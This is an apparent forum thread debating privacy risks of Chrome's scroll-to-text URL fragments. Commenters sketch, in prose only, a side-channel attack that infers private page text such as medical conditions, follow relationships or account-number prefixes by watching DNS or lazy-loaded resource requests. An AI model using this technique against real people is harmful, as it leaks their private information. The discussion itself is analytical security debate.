I always wondered why browser bookmarks don’t just work like this, even if doing so required storing additional metadata outside the URL itself.
One thing that’s interesting about this functionality in Chrome specifically, is that due to the nature of Chrome’s PDF support, these URLs should allow you to deep-link into a PDF from outside it, which hasn’t really been possible before.
Still quite a way from Xanadu transclusions, but it’s a start.
Chrome and other browsers with built-in PDF viewers have long supported the #page=XXX URL syntax, to go directly to a specific page of a PDF document.
This sometimes works only when the document is first loaded; if it’s already open in the window or tab, adding a #page fragment in the address bar won’t always turn the page.
See this Adobe document for other parameters, which aren’t as widely supported:
""Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with #:~:text=cancer," he wrote. "On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested.""
I thought DNS requests just get the domain, not the hash and not even the page requested.
But lets play along. How would sending a link tell you anything apart from if a user clicked said link? How would links to existing anchors example.com#h3-subtitle be any different?
Imagine if the page has 10 parts. Part 1 has an image reference hosted on part1.imagehost.xyz, but loaded lazily. Each part has something analogous, an image hosted on a different domain, but loaded lazily (so, no requests before that part of the page is visible).
If this is really an issue worth solving, doesn't it need to be solved for all cases, both traditional #foo links and also these new pattern-style links?
I can understand that this new mechanism will probably increase how often it can happen, but blocking the new mechanism would only solve part of the problem. To solve the whole problem, you'd have to do something like turn off lazy loading.
Anyway, if the reason the person is visiting the page is to read the section about cancer, aren't they usually going to manually scroll to the section about cancer a lot of the time? So the resource will still be loaded, just a little bit later. The scroll bar is moving to that position either way. The only information leaked is who moved it, the referer or the end user.
I've really been missing this kind of functionality. Modern sites are built by people who apparently don't know or care about HTML name anchors. There is still a need to link to specific parts of pages, particularly in online discussions.
The privacy aspect seems insanely overblown to me, for the reasons you outlined.
I do understand why Brendan is using this moment to criticize this. It's on-brand (his Chromium fork has a privacy angle), and it is going to get him exposure because the supposed bad guy is Google. Don't get me wrong, they (Google) are not "good guys" by default any longer. This thing though? Not so sure. I think it will make things more good than bad, on average.
As you can tell, I think that the difference is a real, technically true difference, but the implication is a bit dumb, since authors do not have this kind of thing in mind when deciding whether to anchor. You might as well be mad about lazy image loading too. If a browser is smart enough to only load images near an anchor, then this same risk would have been opened up when that was introduced. (The author wrote the anchor before lazy loading, so they correctly perceived no risk, then lazy loading turned it into a risk.)
AFAIK we can link to any id in the page, not only to anchors. Strictly speaking you're still right because the author creates those ids but some of them are automatically created by frontend or backend frameworks.
I'm going to backpedal a bit on my point about manual scrolling being the same thing as automatically scrolling directly there via anchor.
The scrollbar can be at various positions, and if an anchor takes you there automatically, it jumps to position N, never passing through 0 .. N-1. Whereas if you manually scroll, you pass through all of 0 .. N. So whatever resources are above the target position would not necessarily be loaded with an anchor but probably would with manually scrolling. So the externally observable wire behavior (DNS, IP addresses you connect to, etc.) may still be different.
So if you manually scroll, the adversary can infer that there's something significant about scrollbar position N. It might just be that there's where you lost interest, or it could be that that's what you found interesting, but it's not giving away as direct a clue as jumping straight to position N.
I am not a web dev so I'd love to hear someone with more knowledge spell out some other privacy concerns.
But also I think the main issue "pes10k" has is that it is adding a new attack vector in a backwards-incompatible way. So a sensitive website which is doing these JS lazy-loading things was "safe" last week, but now can potentially leak information in a way it couldn't have with earlier chrome versions.
In practice though it's hard (for me) to think of a website working this way. I understand the idea of a network admin sending the CEO a link with the text-fragment "cancer" in it. And if that fires off related requests unusually, I can assume it auto-scrolled to "cancer", and the CEO has cancer and sell all my shares. But what sort of website will dynamically contain the word "cancer" for patients that have cancer and is also doing fancy lazy-loading stuff? I'm not a security expert though and I know people can are much cleverer than me when it comes to exploits.
You can't necessarily tell anything from that lone DNS request. But after loading the page, the user's browser will go on to send requests for elements on the page, and anything JS wants to grab based on position, which can be a channel for information.
Example: 99% of your employees' DNS requests to the company health portal are followed by DNS requests to the image CDN a few milliseconds later. However 1 specific request to FakeCompanyHealth.com is immediately followed by a DNS request to MayoClinic.com, because it turns out the web page dynamically loads an iframe to contact the Mayo Clinic once you scroll to the Cancer subsection. You could then assume based on timing that this user clicked a cancer-specific anchor link.
A more realistic example IMO is the twitter friend leak one provided in the Github thread. Send an anchor like "twitter.com#:~:text=@handle" and see if their page-load matches the standard twitter homepage load, or did their browser scroll them halfway down the page and load additional stuff? If so, you can assume these 2 users are friends.,
Edit: Cloudflare has a page to check if ESNI is supported by your browser. I tested it in the latest version of Firefox, Chrome, and Safari and it failed the test in all three.
It's still not realistic at all unless you can already snoop on them in some way.
The starting assumption here is "I assume I already violated someone's privacy in a massive way." Like, ok, sure you can violate it a little more in some situations maybe. But does this introduce any new risks in situations where user privacy hasn't already been so massively hijacked?
And since Chrome, along with others, are moving towards encrypted DNS, the feasibility of getting these DNS lookups is even less plausible than it is today. You need to actually be able to snoop on all the target's network traffic.
I think what that is saying is that, say evil.com starts embedding some sensitive site. It can't normally see the contents of that site, b/c it would be cross origin. (Or any other context where I can load a resource, but not see the content.) If I want to know whether some content is or is not in that sensitive site, I use the scroll-to-fragment to scroll to that text: either it will find the text, and scroll to it, or it won't; evil.com won't know the result of that directly, but it might be able to measure timing/CPU work done, and from that, infer the result: whether that text was or was not in the page. From there, repeat the attack to start brute forcing the content of the page. W.r.t. DNS, if the scrolling or lack of scrolling initiate two separate sets of DNS requests that I can observe, then that's one possible way to leak the information on the page.
At least, that's how I'm reading that security doc; this is fairly different from how other responses to your remark are interpreting it, but I wonder if they were only looking at TFA, which really was not very clearly explaining anything.
The security doc also mentions "Restrict feature to user-gesture initiated navigations", which would completely stop the iframe attack I've outlined above.
So website with bad script injected is loaded by the user and is able to make requests to a logged-in banking website with time-based/scrolling attacks.
I really don't see the issue, to me is a useless argument.
eg on a company network, it would be common to install an SSL cert on all devices on the private network for things like web proxies, CASBs, or other security policy enforcement measures.
The standardization process is meant for reaching agreement among browser makers and to provide clear specs for those features. But it isn't meant for exploration.
That has always been the case. Even Mozilla does it. And if not, then you can't really get the browser vendors to agree on mostly anything a priori, without market validation.
Standardization works as a refinement of already existing work. E.g. Google came with NaCL/PNaCL which was basically their own ActiveX, Mozilla came with Asm.js in response and the end result was Web Assembly, which is objectively better than both and that wouldn't have happened without that prior art.
The W3C doesn't guard what gets implemented in browsers. It never did. And if browser makers willingly participate in the standardization process, we should thank them, because they can always stop doing it. Because really, retreating from the W3C would mean absolutely nothing for computer illiterate people.
But that's besides the point. The W3C haven't been in the driver's seat for a very long time now when it comes to web standards.
Driven by Google, but under the auspices of W3C.
> The W3C haven't been in the driver's seat for a very long time now when it comes to web standards.
That was exactly ghostpepper's point.
At least that has been my understanding of the situation.
Their point is that you can infer the existence of a certain text on a page the user views (even via https) by sending them a link like this and observing the browser loading resources that would be at the bottom of the page. The only reason the browser would do that is if it scrolled to the bottom, confirming the text you put in the link is on the page.
On the other hand, I suspect they probably won't get the mitigations for those real issues right the first time. It's a complicated system they're building, and I think someone will find a clever way to break it.
> A naive implementation of this feature may allow an attacker to determine the existence of textual content across an origin boundary.
Security & privacy implications of that seem obvious, e.g. extracting an account number (or other sensitive information) from a page by searching for successive prefixes.
I just don't think that the DNS query issue mentioned in the article is the thing to be worried about. It's just so much less severe than the fact that DNS isn't encrypted, and requires essentially the same fix.
"Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with #:~:text=cancer," he wrote. "On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested."
But wow, what an absurd amount of work to almost find something out when you already have access to the entire network, and apparently the WiFi is not secured at all or your targets are all plugged in and on your switch. This is like complaining about a weak combination on a padlock used to secure your screen door.
It requires that the attacker has DNS request visibility and expects that a user will visit a vulnerable page - not necessarily huge barriers to entry.
This could be exploited by targeting a user with an advert that appears in the footer of a webpage, for example, and then obtaining DNS logs for that user after-the-fact.
It's a useful feature certainly; the concern is mainly around the fact that this has essentially been self-certified by the development team and rolled out.
With more ISPs looking to monetize DNS logs, and the future of DNS infrastructure looking a little uncertain at the moment, there does seem to be risk here given that it could become widely deployed.
Scroll-to-text Fragment Navigation - Security Issues
The title of the Forbes article is too hyperbolic for my tastes and while this could be a security concern in very specific situations it's being overblown.
Source: was my job to track people and what they do.
Many times I'm looking for an existing anchor for linking to a certain section of the page, because the author did not bother to create a table of contents and many times that anchor ID is missing.
Also — I was under the impression that anything that comes after # is not sent to the server, being a fragment meant to be processed entirely by the client.
What am I missing?
> "Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with #:~:text=cancer," he wrote. "On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested."
- you visit a page at example.com that contains private data about you (e.g. bank account number, medical conditions, what have you)
- this page loads external resources only when they are scrolled into view
- it also hotlinks some image below the fold that a potentially bad actor can see requests to (maybe the image is on their webserver, maybe you're on a corp network and they can see dns resolutions, whatever)
So now I link you to:
Did the image get requested? If yes, I know your account number starts with 1; if not, I know it starts with something other than 1. Rinse and repeat.
Encrypted DNS is a thing, so snooping on those is non-trivial and not at all something you can be assumed to have access to.
How exactly would you as an attacker perform this rinse and repeat action?
All the security concerns I've seen for this seem quite contrived to me. And I say that as someone who assiduously avoids google products*
(*alas, except at work, because I can't really choose that)
1) Privacy-conscious browsers are trying to get exposure, so they are stretching an extremely narrow privacy risk into something extreme.
2) (I also believe) media companies are worried this will rob them of ad exposures, so they are incentivized to cover this as something scary.
3) The "bad guy" is Google. This means the amplitude of the story is immediately 10X larger.
You aren't missing anything. The article is wrong.
This is especially the case if the browser scrolls and doesn't load all prior resources automatically because they were never "in view".
The scenario you've given is also very similar to a scenario in which the user opens the web page and then manually searches for "cancer". Or scrolls down rapidly until they notice the word "cancer" and then stops. I do that all the time for example.
So I don't see how excluding such a feature protects the user in any way compared with the status quo.
I’m not saying we shouldn’t all be rooting for the other players today and keeping a close eye on Google, just saying there is no way for Google to do nearly as much to hold back the web as MS did back then, even if they wanted to.
Whereas anchors tend to be generic (#preexisting-conditions), this new scroll behavior can be used to create an existence check for any user-specific text on the page (in carefully crafted scenarios). There are probably other variations that could be devised on this concept, since it allows indirect page interaction that can bypass authorization walls (since the browser would transmit cookies normally and such).
I'd like to call myself a privacy advocate, but this is just absurd. The pros obviously outweigh the con of a very precise and targeted attack that leaks a predetermined bit of information.
If you've got their DNS records, you've already violated plenty of their privacy to get the information you want. No need for this text fragment "attack."
Yeah, my read of this is that it has nothing to do with privacy, people who want to block change for some reason have just learned that "i have privacy concerns about google" is a catchword that will get you some press coverage, and are essentially hijacking the actually valid and important privacy concerns to push forward their unrelated opinions (and promote their browser product).
As a FF user, I'd love to see FF implement this too!
This would behave differently if the browser's user is following @user than otherwise.
This convinced me not to dismiss the issue.
I'm not sure how that leaks over a side channel.
But i am sure there are governments who take active measures to shape the Internet to their liking - and twitter has played a significant role in the past inside countries governed by them to oppose these governments.
So the only way someone could see that you're navigating to a specific fragment is some sort of deep chrome logging, or chrome plugin, etc. And if that's the case, cat's already out of the bag for everything you do already.
At this point, Wikipedia is one of the few websites I use regularly that actually works in this way.
I just went to the most recent github tab in my browser session and found one instantly: https://github.com/quiet/quiet#dependencies
That said, the github one is a sort of interesting case, insofar as they're doing it to avoid user-generated content clashing with their page-chrome ids... while still preserving a readable URI that matches what the content creator expects. Which doesn't seem like an unreasonable case, to me.
I had tested linking to specific comments in issue threads, which does work with JS disabled (unless I've completely messed up...), and assumed that linking to parts of documents, as less complex/application-y would obviously work, but as you've pointed out it doesn't.
That's highly disappointing.
Wouldn't be nice to have people worry about this while hundreds of other actual privacy reducing features go unnoticed?
"Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with [the anchor] #:~:text=cancer. On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested.”
So they could send someone a link to a page with a fragment, trick them into clicking it, and matching text and watch for DNS requests being lazy-loaded to learn the fact that they clicked it.
It's convoluted nonsense.
It took some configuration, but I'm not regretting it at all.
How can you tell a user didn't jitter scroll and caused more content to show up?
What if it was a 404 page.
How's the intruder able to see the query param anyway? if it's non secure all bets are off.
The same argument used revolving around text can be made about words in a domain name.
That seems to complicate things for no good reason.
Though, I'm curious how this works when text is broken apart over spans or divs.
Something actionable, something specific to my semi-unique position as a developer?
As a developer you, like many of us might be the family tech support. Switch them to firefox.
The world's information is merely one click away.
The world's browsers are simply two clicks away.
Dispensing candy is an easy ctrl-triple-click.
Bootstrapping a compiler is just the konami code backwards.
Printing the screen is really simple as hitting PrintSrc and loading your printer with $300 cyan ink cartridges.
However turning the computer off is a week-long process that involves arguing with the built-in HAL9000
You wont. Because it didnt work and killed SEO. Than after years they silently removed documentation about it. Not providing any way to transition to other ways without damaging SEO ever more and moreover, it was impossible to do anything about it because server does not receive data after hash.
And now Google tries to force new standard that is technically broken. Dont use it. It is a trap. It will hurt your SEO sooner or later!
There was another article on this same topic this morning with this:
"Google's engineers have not ignored worries about the security and privacy risks. To their credit, they've gathered them together into a single document and they've clearly been engaged in understanding what people are worried about. It's just that they've concluded the concerns aren't that big a deal or can be dealt with to their satisfaction."
That Single Document is here, and I went and had a read this morning, but now I get permission denied, I guess it was getting too much attention?
I wish I would've save a copy now. It hand some decent details on the various vulnerabilities and how they are handling (or ignoring) them.